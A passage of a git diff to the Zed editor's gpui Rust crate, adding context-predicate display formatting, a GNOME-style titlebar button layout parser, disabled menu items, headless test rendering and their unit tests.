Unbind("test_only::ActionAlpha".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + assert_bindings(&keymap, &ActionAlpha {}, &["tab"]); + assert_bindings(&keymap, &ActionBeta {}, &["tab"]); + + #[track_caller] + fn assert_bindings(keymap: &Keymap, action: &dyn Action, expected: &[&str]) { + let actual = keymap + .bindings_for_action(action) + .map(|binding| binding.keystrokes[0].inner().unparse()) + .collect::>(); + assert_eq!(actual, expected, "{:?}", action); + } + } + + #[test] + fn test_bindings_for_action_removes_binding_for_broader_targeted_unbind() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor && edit_prediction")), + KeyBinding::new( + "tab", + Unbind("test_only::ActionAlpha".into()), + Some("Editor"), + ), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + assert!(keymap.bindings_for_action(&ActionAlpha {}).next().is_none()); + } + #[test] fn test_source_precedence_sorting() { // KeybindSource precedence: User (0) > Vim (1) > Base (2) > Default (3) diff --git a/crates/gpui/src/keymap/context.rs b/crates/gpui/src/keymap/context.rs index f47ab307b6ba133bdfd40094322776f4c98a905c..27f361bbe28a812a2b8996433854504d26bfece7 100644 --- a/crates/gpui/src/keymap/context.rs +++ b/crates/gpui/src/keymap/context.rs @@ -199,13 +199,20 @@ pub enum KeyBindingContextPredicate { impl fmt::Display for KeyBindingContextPredicate { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { - Self::Identifier(name) => write!(f, "{}", name), - Self::Equal(left, right) => write!(f, "{} == {}", left, right), - Self::NotEqual(left, right) => write!(f, "{} != {}", left, right), - Self::Not(pred) => write!(f, "!{}", pred), - Self::Descendant(parent, child) => write!(f, "{} > {}", parent, child), - Self::And(left, right) => write!(f, "({} && {})", left, 
right), - Self::Or(left, right) => write!(f, "({} || {})", left, right), + Self::Identifier(name) => write!(f, "{name}"), + Self::Equal(left, right) => write!(f, "{left} == {right}"), + Self::NotEqual(left, right) => write!(f, "{left} != {right}"), + Self::Descendant(parent, child) => write!(f, "{parent} > {child}"), + Self::Not(pred) => match pred.as_ref() { + Self::Identifier(name) => write!(f, "!{name}"), + _ => write!(f, "!({pred})"), + }, + Self::And(..) => self.fmt_joined(f, " && ", LogicalOperator::And, |node| { + matches!(node, Self::Or(..)) + }), + Self::Or(..) => self.fmt_joined(f, " || ", LogicalOperator::Or, |node| { + matches!(node, Self::And(..)) + }), } } } @@ -436,6 +443,52 @@ impl KeyBindingContextPredicate { anyhow::bail!("operands of != must be identifiers"); } } + + fn fmt_joined( + &self, + f: &mut fmt::Formatter<'_>, + separator: &str, + operator: LogicalOperator, + needs_parens: impl Fn(&Self) -> bool + Copy, + ) -> fmt::Result { + let mut first = true; + self.fmt_joined_inner(f, separator, operator, needs_parens, &mut first) + } + + fn fmt_joined_inner( + &self, + f: &mut fmt::Formatter<'_>, + separator: &str, + operator: LogicalOperator, + needs_parens: impl Fn(&Self) -> bool + Copy, + first: &mut bool, + ) -> fmt::Result { + match (operator, self) { + (LogicalOperator::And, Self::And(left, right)) + | (LogicalOperator::Or, Self::Or(left, right)) => { + left.fmt_joined_inner(f, separator, operator, needs_parens, first)?; + right.fmt_joined_inner(f, separator, operator, needs_parens, first) + } + (_, node) => { + if !*first { + f.write_str(separator)?; + } + *first = false; + + if needs_parens(node) { + write!(f, "({node})") + } else { + write!(f, "{node}") + } + } + } + } +} + +#[derive(Clone, Copy)] +enum LogicalOperator { + And, + Or, } const PRECEDENCE_CHILD: u32 = 1; @@ -757,4 +810,82 @@ mod tests { assert!(not_workspace.eval(slice::from_ref(&editor_context))); assert!(!not_workspace.eval(&workspace_pane_editor)); } + + // MARK: - 
Display + + #[test] + fn test_context_display() { + fn ident(s: &str) -> Box { + Box::new(Identifier(SharedString::new(s))) + } + fn eq(a: &str, b: &str) -> Box { + Box::new(Equal(SharedString::new(a), SharedString::new(b))) + } + fn not_eq(a: &str, b: &str) -> Box { + Box::new(NotEqual(SharedString::new(a), SharedString::new(b))) + } + fn and( + a: Box, + b: Box, + ) -> Box { + Box::new(And(a, b)) + } + fn or( + a: Box, + b: Box, + ) -> Box { + Box::new(Or(a, b)) + } + fn descendant( + a: Box, + b: Box, + ) -> Box { + Box::new(Descendant(a, b)) + } + fn not(a: Box) -> Box { + Box::new(Not(a)) + } + + let test_cases = [ + (ident("a"), "a"), + (eq("a", "b"), "a == b"), + (not_eq("a", "b"), "a != b"), + (descendant(ident("a"), ident("b")), "a > b"), + (not(ident("a")), "!a"), + (not_eq("a", "b"), "a != b"), + (descendant(ident("a"), ident("b")), "a > b"), + (not(and(ident("a"), ident("b"))), "!(a && b)"), + (not(or(ident("a"), ident("b"))), "!(a || b)"), + (and(ident("a"), ident("b")), "a && b"), + (and(and(ident("a"), ident("b")), ident("c")), "a && b && c"), + (or(ident("a"), ident("b")), "a || b"), + (or(or(ident("a"), ident("b")), ident("c")), "a || b || c"), + (or(ident("a"), and(ident("b"), ident("c"))), "a || (b && c)"), + ( + and( + and( + and(ident("a"), eq("b", "c")), + not(descendant(ident("d"), ident("e"))), + ), + eq("f", "g"), + ), + "a && b == c && !(d > e) && f == g", + ), + ( + and(and(ident("a"), or(ident("b"), ident("c"))), ident("d")), + "a && (b || c) && d", + ), + ( + or(or(ident("a"), and(ident("b"), ident("c"))), ident("d")), + "a || (b && c) || d", + ), + ]; + + for (predicate, expected) in test_cases { + let actual = predicate.to_string(); + assert_eq!(actual, expected); + let parsed = KeyBindingContextPredicate::parse(&actual).unwrap(); + assert_eq!(parsed, *predicate); + } + } } diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index a6714ff250f2f854c51d30bfea5e2e5911ce60ee..efca26a6b4802037a96490bf81f7d1c5c1d8b298 
100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -37,6 +37,8 @@ use crate::{ ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, }; use anyhow::Result; +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +use anyhow::bail; use async_task::Runnable; use futures::channel::oneshot; #[cfg(any(test, feature = "test-support"))] @@ -78,6 +80,7 @@ pub use test::{TestDispatcher, TestScreenCaptureSource, TestScreenCaptureStream} #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] pub use visual_test::VisualTestPlatform; +// TODO(jk): return an enum instead of a string /// Return which compositor we're guessing we'll use. /// Does not attempt to connect to the given compositor. #[cfg(any(target_os = "linux", target_os = "freebsd"))] @@ -155,6 +158,11 @@ pub trait Platform: 'static { /// Returns the appearance of the application's windows. fn window_appearance(&self) -> WindowAppearance; + /// Returns the window button layout configuration when supported. + fn button_layout(&self) -> Option { + None + } + fn open_url(&self, url: &str); fn on_open_urls(&self, callback: Box)>); fn register_url_scheme(&self, url: &str) -> Task>; @@ -406,6 +414,145 @@ impl Default for WindowControls { } } +/// A window control button type used in [`WindowButtonLayout`]. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] +pub enum WindowButton { + /// The minimize button + Minimize, + /// The maximize button + Maximize, + /// The close button + Close, +} + +impl WindowButton { + /// Returns a stable element ID for rendering this button. 
+ pub fn id(&self) -> &'static str { + match self { + WindowButton::Minimize => "minimize", + WindowButton::Maximize => "maximize", + WindowButton::Close => "close", + } + } + + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + fn index(&self) -> usize { + match self { + WindowButton::Minimize => 0, + WindowButton::Maximize => 1, + WindowButton::Close => 2, + } + } +} + +/// Maximum number of [`WindowButton`]s per side in the titlebar. +pub const MAX_BUTTONS_PER_SIDE: usize = 3; + +/// Describes which [`WindowButton`]s appear on each side of the titlebar. +/// +/// On Linux, this is read from the desktop environment's configuration +/// (e.g. GNOME's `gtk-decoration-layout` gsetting) via [`WindowButtonLayout::parse`]. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub struct WindowButtonLayout { + /// Buttons on the left side of the titlebar. + pub left: [Option; MAX_BUTTONS_PER_SIDE], + /// Buttons on the right side of the titlebar. + pub right: [Option; MAX_BUTTONS_PER_SIDE], +} + +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +impl WindowButtonLayout { + /// Returns Zed's built-in fallback button layout for Linux titlebars. + pub fn linux_default() -> Self { + Self { + left: [None; MAX_BUTTONS_PER_SIDE], + right: [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close), + ], + } + } + + /// Parses a GNOME-style `button-layout` string (e.g. `"close,minimize:maximize"`). 
+ pub fn parse(layout_string: &str) -> Result { + fn parse_side( + s: &str, + seen_buttons: &mut [bool; MAX_BUTTONS_PER_SIDE], + unrecognized: &mut Vec, + ) -> [Option; MAX_BUTTONS_PER_SIDE] { + let mut result = [None; MAX_BUTTONS_PER_SIDE]; + let mut i = 0; + for name in s.split(',') { + let trimmed = name.trim(); + if trimmed.is_empty() { + continue; + } + let button = match trimmed { + "minimize" => Some(WindowButton::Minimize), + "maximize" => Some(WindowButton::Maximize), + "close" => Some(WindowButton::Close), + other => { + unrecognized.push(other.to_string()); + None + } + }; + if let Some(button) = button { + if seen_buttons[button.index()] { + continue; + } + if let Some(slot) = result.get_mut(i) { + *slot = Some(button); + seen_buttons[button.index()] = true; + i += 1; + } + } + } + result + } + + let (left_str, right_str) = layout_string.split_once(':').unwrap_or(("", layout_string)); + let mut unrecognized = Vec::new(); + let mut seen_buttons = [false; MAX_BUTTONS_PER_SIDE]; + let layout = Self { + left: parse_side(left_str, &mut seen_buttons, &mut unrecognized), + right: parse_side(right_str, &mut seen_buttons, &mut unrecognized), + }; + + if !unrecognized.is_empty() + && layout.left.iter().all(Option::is_none) + && layout.right.iter().all(Option::is_none) + { + bail!( + "button layout string {:?} contains no valid buttons (unrecognized: {})", + layout_string, + unrecognized.join(", ") + ); + } + + Ok(layout) + } + + /// Formats the layout back into a GNOME-style `button-layout` string. 
+ #[cfg(test)] + pub fn format(&self) -> String { + fn format_side(buttons: &[Option; MAX_BUTTONS_PER_SIDE]) -> String { + buttons + .iter() + .flatten() + .map(|button| match button { + WindowButton::Minimize => "minimize", + WindowButton::Maximize => "maximize", + WindowButton::Close => "close", + }) + .collect::>() + .join(",") + } + + format!("{}:{}", format_side(&self.left), format_side(&self.right)) + } +} + /// A type to describe which sides of the window are currently tiled in some way #[derive(Debug, Copy, Clone, Eq, PartialEq, Hash, Default)] pub struct Tiling { @@ -487,6 +634,7 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { fn on_hit_test_window_control(&self, callback: Box Option>); fn on_close(&self, callback: Box); fn on_appearance_changed(&self, callback: Box); + fn on_button_layout_changed(&self, _callback: Box) {} fn draw(&self, scene: &Scene); fn completed_frame(&self) {} fn sprite_atlas(&self) -> Arc; @@ -541,6 +689,8 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { fn update_ime_position(&self, _bounds: Bounds); + fn play_system_bell(&self) {} + #[cfg(any(test, feature = "test-support"))] fn as_test(&mut self) -> Option<&mut TestWindow> { None @@ -555,6 +705,20 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { } } +/// A renderer for headless windows that can produce real rendered output. +#[cfg(any(test, feature = "test-support"))] +pub trait PlatformHeadlessRenderer { + /// Render a scene and return the result as an RGBA image. + fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> Result; + + /// Returns the sprite atlas used by this renderer. + fn sprite_atlas(&self) -> Arc; +} + /// Type alias for runnables with metadata. /// Previously an enum with a single variant, now simplified to a direct type alias. 
#[doc(hidden)] @@ -573,6 +737,7 @@ pub trait PlatformDispatcher: Send + Sync { fn dispatch(&self, runnable: RunnableVariant, priority: Priority); fn dispatch_on_main_thread(&self, runnable: RunnableVariant, priority: Priority); fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant); + fn spawn_realtime(&self, f: Box); fn now(&self) -> Instant { @@ -592,19 +757,29 @@ pub trait PlatformDispatcher: Send + Sync { #[expect(missing_docs)] pub trait PlatformTextSystem: Send + Sync { fn add_fonts(&self, fonts: Vec>) -> Result<()>; + /// Get all available font names. fn all_font_names(&self) -> Vec; + /// Get the font ID for a font descriptor. fn font_id(&self, descriptor: &Font) -> Result; + /// Get metrics for a font. fn font_metrics(&self, font_id: FontId) -> FontMetrics; + /// Get typographic bounds for a glyph. fn typographic_bounds(&self, font_id: FontId, glyph_id: GlyphId) -> Result>; + /// Get the advance width for a glyph. fn advance(&self, font_id: FontId, glyph_id: GlyphId) -> Result>; + /// Get the glyph ID for a character. fn glyph_for_char(&self, font_id: FontId, ch: char) -> Option; + /// Get raster bounds for a glyph. fn glyph_raster_bounds(&self, params: &RenderGlyphParams) -> Result>; + /// Rasterize a glyph. fn rasterize_glyph( &self, params: &RenderGlyphParams, raster_bounds: Bounds, ) -> Result<(Size, Vec)>; + /// Layout a line of text with the given font runs. fn layout_line(&self, text: &str, font_size: Pixels, runs: &[FontRun]) -> LineLayout; + /// Returns the recommended text rendering mode for the given font and size. 
fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels) -> TextRenderingMode; } @@ -1062,6 +1237,20 @@ impl PlatformInputHandler { pub fn accepts_text_input(&mut self, window: &mut Window, cx: &mut App) -> bool { self.handler.accepts_text_input(window, cx) } + + #[allow(dead_code)] + pub fn query_accepts_text_input(&mut self) -> bool { + self.cx + .update(|window, cx| self.handler.accepts_text_input(window, cx)) + .unwrap_or(true) + } + + #[allow(dead_code)] + pub fn query_prefers_ime_for_printable_keys(&mut self) -> bool { + self.cx + .update(|window, cx| self.handler.prefers_ime_for_printable_keys(window, cx)) + .unwrap_or(false) + } } /// A struct representing a selection in a text buffer, in UTF16 characters. @@ -1175,6 +1364,18 @@ pub trait InputHandler: 'static { fn accepts_text_input(&mut self, _window: &mut Window, _cx: &mut App) -> bool { true } + + /// Returns whether printable keys should be routed to the IME before keybinding + /// matching when a non-ASCII input source (e.g. Japanese, Korean, Chinese IME) + /// is active. This prevents multi-stroke keybindings like `jj` from intercepting + /// keys that the IME should compose. + /// + /// Defaults to `false`. The editor overrides this based on whether it expects + /// character input (e.g. Vim insert mode returns `true`, normal mode returns `false`). + /// The terminal keeps the default `false` so that raw keys reach the terminal process. 
+ fn prefers_ime_for_printable_keys(&mut self, _window: &mut Window, _cx: &mut App) -> bool { + false + } } /// The variables that can be configured when creating a new window @@ -1909,7 +2110,7 @@ impl Image { ImageFormat::Ico => frames_for_image(&self.bytes, image::ImageFormat::Ico)?, ImageFormat::Svg => { return svg_renderer - .render_single_frame(&self.bytes, 1.0, false) + .render_single_frame(&self.bytes, 1.0) .map_err(Into::into); } }; @@ -1990,3 +2191,209 @@ impl From for ClipboardString { } } } + +#[cfg(test)] +mod image_tests { + use super::*; + use std::sync::Arc; + + #[test] + fn test_svg_image_to_image_data_converts_to_bgra() { + let image = Image::from_bytes( + ImageFormat::Svg, + br##" + +"## + .to_vec(), + ); + + let render_image = image.to_image_data(SvgRenderer::new(Arc::new(()))).unwrap(); + let bytes = render_image.as_bytes(0).unwrap(); + + for pixel in bytes.chunks_exact(4) { + assert_eq!(pixel, &[0xF8, 0xBD, 0x38, 0xFF]); + } + } +} + +#[cfg(all(test, any(target_os = "linux", target_os = "freebsd")))] +mod tests { + use super::*; + use std::collections::HashSet; + + #[test] + fn test_window_button_layout_parse_standard() { + let layout = WindowButtonLayout::parse("close,minimize:maximize").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_right_only() { + let layout = WindowButtonLayout::parse("minimize,maximize,close").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close) + ] + ); + } + + #[test] + fn test_window_button_layout_parse_left_only() { + let layout = WindowButtonLayout::parse("close,minimize,maximize:").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + 
Some(WindowButton::Maximize) + ] + ); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_with_whitespace() { + let layout = WindowButtonLayout::parse(" close , minimize : maximize ").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_empty() { + let layout = WindowButtonLayout::parse("").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_intentionally_empty() { + let layout = WindowButtonLayout::parse(":").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_invalid_buttons() { + let layout = WindowButtonLayout::parse("close,invalid,minimize:maximize,foo").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_deduplicates_same_side_buttons() { + let layout = WindowButtonLayout::parse("close,close,minimize").unwrap(); + assert_eq!( + layout.right, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.format(), ":close,minimize"); + } + + #[test] + fn test_window_button_layout_parse_deduplicates_buttons_across_sides() { + let layout = WindowButtonLayout::parse("close:maximize,close,minimize").unwrap(); + assert_eq!(layout.left, [Some(WindowButton::Close), None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Maximize), + Some(WindowButton::Minimize), + None + ] + ); + + let button_ids: Vec<_> = layout + .left + .iter() + .chain(layout.right.iter()) + .flatten() + 
.map(WindowButton::id) + .collect(); + let unique_button_ids = button_ids.iter().copied().collect::>(); + assert_eq!(unique_button_ids.len(), button_ids.len()); + assert_eq!(layout.format(), "close:maximize,minimize"); + } + + #[test] + fn test_window_button_layout_parse_gnome_style() { + let layout = WindowButtonLayout::parse("close").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [Some(WindowButton::Close), None, None]); + } + + #[test] + fn test_window_button_layout_parse_elementary_style() { + let layout = WindowButtonLayout::parse("close:maximize").unwrap(); + assert_eq!(layout.left, [Some(WindowButton::Close), None, None]); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_round_trip() { + let cases = [ + "close:minimize,maximize", + "minimize,maximize,close:", + ":close", + "close:", + "close:maximize", + ":", + ]; + + for case in cases { + let layout = WindowButtonLayout::parse(case).unwrap(); + assert_eq!(layout.format(), case, "Round-trip failed for: {}", case); + } + } + + #[test] + fn test_window_button_layout_linux_default() { + let layout = WindowButtonLayout::linux_default(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close) + ] + ); + + let round_tripped = WindowButtonLayout::parse(&layout.format()).unwrap(); + assert_eq!(round_tripped, layout); + } + + #[test] + fn test_window_button_layout_parse_all_invalid() { + assert!(WindowButtonLayout::parse("asdfghjkl").is_err()); + } +} diff --git a/crates/gpui/src/platform/app_menu.rs b/crates/gpui/src/platform/app_menu.rs index b1e0d82bb9f6d4ee265d047f562e088a8e48c1db..27c20c00badc50a965560073885f09a4e271ce5e 100644 --- a/crates/gpui/src/platform/app_menu.rs +++ b/crates/gpui/src/platform/app_menu.rs @@ -7,14 +7,39 @@ pub struct Menu { /// The items in the menu pub items: Vec, + + 
/// Whether this menu is disabled + pub disabled: bool, } impl Menu { + /// Create a new Menu with the given name + pub fn new(name: impl Into) -> Self { + Self { + name: name.into(), + items: vec![], + disabled: false, + } + } + + /// Set items to be in this menu + pub fn items(mut self, items: impl IntoIterator) -> Self { + self.items = items.into_iter().collect(); + self + } + + /// Set whether this menu is disabled + pub fn disabled(mut self, disabled: bool) -> Self { + self.disabled = disabled; + self + } + /// Create an OwnedMenu from this Menu pub fn owned(self) -> OwnedMenu { OwnedMenu { name: self.name.to_string().into(), items: self.items.into_iter().map(|item| item.owned()).collect(), + disabled: self.disabled, } } } @@ -72,6 +97,9 @@ pub enum MenuItem { /// Whether this action is checked checked: bool, + + /// Whether this action is disabled + disabled: bool, }, } @@ -101,6 +129,7 @@ impl MenuItem { action: Box::new(action), os_action: None, checked: false, + disabled: false, } } @@ -115,6 +144,7 @@ impl MenuItem { action: Box::new(action), os_action: Some(os_action), checked: false, + disabled: false, } } @@ -128,11 +158,13 @@ impl MenuItem { action, os_action, checked, + disabled, } => OwnedMenuItem::Action { name: name.into(), action, os_action, checked, + disabled, }, MenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.owned()), } @@ -142,19 +174,49 @@ impl MenuItem { /// /// Only for [`MenuItem::Action`], otherwise, will be ignored pub fn checked(mut self, checked: bool) -> Self { + match &mut self { + MenuItem::Action { checked: old, .. } => { + *old = checked; + } + _ => {} + } + self + } + + /// Returns whether this menu item is checked + /// + /// Only for [`MenuItem::Action`], otherwise, returns false + #[inline] + pub fn is_checked(&self) -> bool { match self { - MenuItem::Action { - action, - os_action, - name, - .. 
- } => MenuItem::Action { - name, - action, - os_action, - checked, - }, - _ => self, + MenuItem::Action { checked, .. } => *checked, + _ => false, + } + } + + /// Set whether this menu item is disabled + pub fn disabled(mut self, disabled: bool) -> Self { + match &mut self { + MenuItem::Action { disabled: old, .. } => { + *old = disabled; + } + MenuItem::Submenu(submenu) => { + submenu.disabled = disabled; + } + _ => {} + } + self + } + + /// Returns whether this menu item is disabled + /// + /// Only for [`MenuItem::Action`] and [`MenuItem::Submenu`], otherwise, returns false + #[inline] + pub fn is_disabled(&self) -> bool { + match self { + MenuItem::Action { disabled, .. } => *disabled, + MenuItem::Submenu(submenu) => submenu.disabled, + _ => false, } } } @@ -179,6 +241,9 @@ pub struct OwnedMenu { /// The items in the menu pub items: Vec, + + /// Whether this menu is disabled + pub disabled: bool, } /// The different kinds of items that can be in a menu @@ -206,6 +271,9 @@ pub enum OwnedMenuItem { /// Whether this action is checked checked: bool, + + /// Whether this action is disabled + disabled: bool, }, } @@ -219,11 +287,13 @@ impl Clone for OwnedMenuItem { action, os_action, checked, + disabled, } => OwnedMenuItem::Action { name: name.clone(), action: action.boxed_clone(), os_action: *os_action, checked: *checked, + disabled: *disabled, }, OwnedMenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.clone()), } @@ -287,3 +357,70 @@ pub(crate) fn init_app_menus(platform: &dyn Platform, cx: &App) { } })); } + +#[cfg(test)] +mod tests { + use crate::Menu; + + #[test] + fn test_menu() { + let menu = Menu::new("App") + .items(vec![ + crate::MenuItem::action("Action 1", gpui::NoAction), + crate::MenuItem::separator(), + ]) + .disabled(true); + + assert_eq!(menu.name.as_ref(), "App"); + assert_eq!(menu.items.len(), 2); + assert!(menu.disabled); + } + + #[test] + fn test_menu_item_builder() { + use super::MenuItem; + + let item = MenuItem::action("Test 
Action", gpui::NoAction); + assert_eq!( + match &item { + MenuItem::Action { name, .. } => name.as_ref(), + _ => unreachable!(), + }, + "Test Action" + ); + assert!(matches!( + item, + MenuItem::Action { + checked: false, + disabled: false, + .. + } + )); + + assert!( + MenuItem::action("Test Action", gpui::NoAction) + .checked(true) + .is_checked() + ); + assert!( + MenuItem::action("Test Action", gpui::NoAction) + .disabled(true) + .is_disabled() + ); + + let submenu = MenuItem::submenu(super::Menu { + name: "Submenu".into(), + items: vec![], + disabled: true, + }); + assert_eq!( + match &submenu { + MenuItem::Submenu(menu) => menu.name.as_ref(), + _ => unreachable!(), + }, + "Submenu" + ); + assert!(!submenu.is_checked()); + assert!(submenu.is_disabled()); + } +} diff --git a/crates/gpui/src/platform/test/dispatcher.rs b/crates/gpui/src/platform/test/dispatcher.rs index 081f5feab014b3712fa23290038f34d8ed4f5a92..29aff84ff9d07f3a558ab68f2ac3117835688cc8 100644 --- a/crates/gpui/src/platform/test/dispatcher.rs +++ b/crates/gpui/src/platform/test/dispatcher.rs @@ -30,11 +30,12 @@ impl TestDispatcher { .map_or(false, |var| var == "1" || var == "true"), timeout_ticks: 0..=1000, })); + Self::from_scheduler(scheduler) + } - let session_id = scheduler.allocate_session_id(); - + pub fn from_scheduler(scheduler: Arc) -> Self { TestDispatcher { - session_id, + session_id: scheduler.allocate_session_id(), scheduler, num_cpus_override: Arc::new(AtomicUsize::new(0)), } @@ -48,6 +49,10 @@ impl TestDispatcher { self.session_id } + pub fn drain_tasks(&self) { + self.scheduler.drain_tasks(); + } + pub fn advance_clock(&self, by: Duration) { self.scheduler.advance_clock(by); } @@ -72,6 +77,14 @@ impl TestDispatcher { while self.tick(false) {} } + pub fn allow_parking(&self) { + self.scheduler.allow_parking(); + } + + pub fn forbid_parking(&self) { + self.scheduler.forbid_parking(); + } + /// Override the value returned by `BackgroundExecutor::num_cpus()` in tests. 
/// A value of 0 means no override (the default of 4 is used). pub fn set_num_cpus(&self, count: usize) { diff --git a/crates/gpui/src/platform/test/platform.rs b/crates/gpui/src/platform/test/platform.rs index 1da42f5742215f9001dcbd09cc42977ea28623ea..a59b21f038a01b48686ee211919afd7c647b7331 100644 --- a/crates/gpui/src/platform/test/platform.rs +++ b/crates/gpui/src/platform/test/platform.rs @@ -1,9 +1,9 @@ use crate::{ AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DevicePixels, DummyKeyboardMapper, ForegroundExecutor, Keymap, NoopTextSystem, Platform, PlatformDisplay, - PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, PromptButton, - ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, Task, - TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size, + PlatformHeadlessRenderer, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, + PromptButton, ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, + Task, TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size, }; use anyhow::Result; use collections::VecDeque; @@ -34,6 +34,7 @@ pub(crate) struct TestPlatform { pub opened_url: RefCell>, pub text_system: Arc, pub expect_restart: RefCell>>>, + headless_renderer_factory: Option Option>>>, weak: Weak, } @@ -88,8 +89,30 @@ pub(crate) struct TestPrompts { impl TestPlatform { pub fn new(executor: BackgroundExecutor, foreground_executor: ForegroundExecutor) -> Rc { - let text_system = Arc::new(NoopTextSystem); - + Self::with_platform( + executor, + foreground_executor, + Arc::new(NoopTextSystem), + None, + ) + } + + pub fn with_text_system( + executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + text_system: Arc, + ) -> Rc { + Self::with_platform(executor, foreground_executor, text_system, None) + } + + pub fn with_platform( + executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + 
text_system: Arc, + headless_renderer_factory: Option< + Box Option>>, + >, + ) -> Rc { Rc::new_cyclic(|weak| TestPlatform { background_executor: executor, foreground_executor, @@ -107,6 +130,7 @@ impl TestPlatform { weak: weak.clone(), opened_url: Default::default(), text_system, + headless_renderer_factory, }) } @@ -299,11 +323,13 @@ impl Platform for TestPlatform { handle: AnyWindowHandle, params: WindowParams, ) -> anyhow::Result> { + let renderer = self.headless_renderer_factory.as_ref().and_then(|f| f()); let window = TestWindow::new( handle, params, self.weak.clone(), self.active_display.clone(), + renderer, ); Ok(Box::new(window)) } diff --git a/crates/gpui/src/platform/test/window.rs b/crates/gpui/src/platform/test/window.rs index feb3b162abe09d8cdef008aa9f794b046da22cc6..583450c9e93e6bfdf8f45a4dcd1a83feb9b08111 100644 --- a/crates/gpui/src/platform/test/window.rs +++ b/crates/gpui/src/platform/test/window.rs @@ -1,10 +1,12 @@ use crate::{ - AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DispatchEventResult, GpuSpecs, - Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, - Point, PromptButton, RequestFrameOptions, Size, TestPlatform, TileId, WindowAppearance, + AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DevicePixels, + DispatchEventResult, GpuSpecs, Pixels, PlatformAtlas, PlatformDisplay, + PlatformHeadlessRenderer, PlatformInput, PlatformInputHandler, PlatformWindow, Point, + PromptButton, RequestFrameOptions, Scene, Size, TestPlatform, TileId, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowParams, }; use collections::HashMap; +use image::RgbaImage; use parking_lot::Mutex; use raw_window_handle::{HasDisplayHandle, HasWindowHandle}; use std::{ @@ -21,6 +23,7 @@ pub(crate) struct TestWindowState { platform: Weak, // TODO: Replace with `Rc` sprite_atlas: Arc, + renderer: Option>, pub(crate) should_close_handler: Option bool>>, 
